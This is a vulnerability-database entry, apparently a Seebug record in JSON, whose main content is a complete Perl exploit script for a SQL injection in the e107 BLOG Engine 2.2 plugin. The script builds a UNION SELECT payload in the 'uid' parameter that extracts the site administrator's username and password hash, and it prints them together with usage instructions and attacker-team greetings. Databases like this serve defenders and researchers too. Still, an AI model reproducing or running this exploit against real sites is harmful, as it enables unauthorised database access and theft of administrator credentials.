DATABASE RESOURCES PRICING ABOUT US

{"href": "https://www.seebug.org/vuldb/ssvid-9401", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-09-03T00:00:00", "title": "e107 Plugin BLOG Engine 2.2 (uid) SQL Injection Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-9401", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2008-09-03T00:00:00", "sourceData": "\n #!/usr/bin/perl \r\n##############################################################\r\n# e107 Plugin BLOG Engine v2.2 SQL Injection Exploit # \r\n# ..::virangar security team::.. # \r\n# www.virangar.net # \r\n# C0d3d BY:virangar security team ( hadihadi ) # \r\n#special tnx to: # \r\n#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra # \r\n#& all virangar members & all hackerz # \r\n# my lovely friends hadi_aryaie2004 & arash(imm02tal) # \r\n# ..:::Young Iranina Hackerz::.. # \r\n############################################################## \r\n \r\n \r\nuse HTTP::Request; \r\nuse LWP::UserAgent; \r\n \r\nif (@ARGV != 1){ \r\nheader(); \r\n} \r\n$site = $ARGV[0]; \r\n \r\n$attack= "$site"."?uid=-99999%20union%20select%201,concat(0x3c757365723e,user_name,0x3c757365723e,user_password),3%20from%20e107_user%20where%20user_ \r\nid=1/*"; \r\n$b = LWP::UserAgent->new() or die "Could not initialize browser\\n"; \r\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); \r\n$req = $b->request(HTTP::Request->new(GET=>$attack)); \r\n$res = $req->content; \r\n \r\nif ($res =~ /<user>(.*?)<user>/){ \r\n print "\\n[+] Admin User : $1";} \r\nif ($res =~/([0-9a-fA-F]{32})/){ \r\nprint "\\n[+] Admin Hash : $1\\n\\n"; \r\nprint "\\n[+]Done\\n";} \r\n \r\nsub header { \r\nprint qq{ \r\n################################################################### \r\n# e107 Plugin BLOG Engine v2.2 SQL Injection Exploit # \r\n# www.virangar.net # \r\n# Useage: perl $0 Host # \r\n# # \r\n# Host: full patch to macgurublog.php (dont forget http://) # \r\n# # \r\n# Example: # \r\n# perl $0 http://site/macgurublog_menu/macgurublog.php # \r\n# # \r\n################################################################### \r\n}; \r\n} \n ", "id": "SSV:9401", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:30:27", "reporter": "Root", "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647499097}}

{}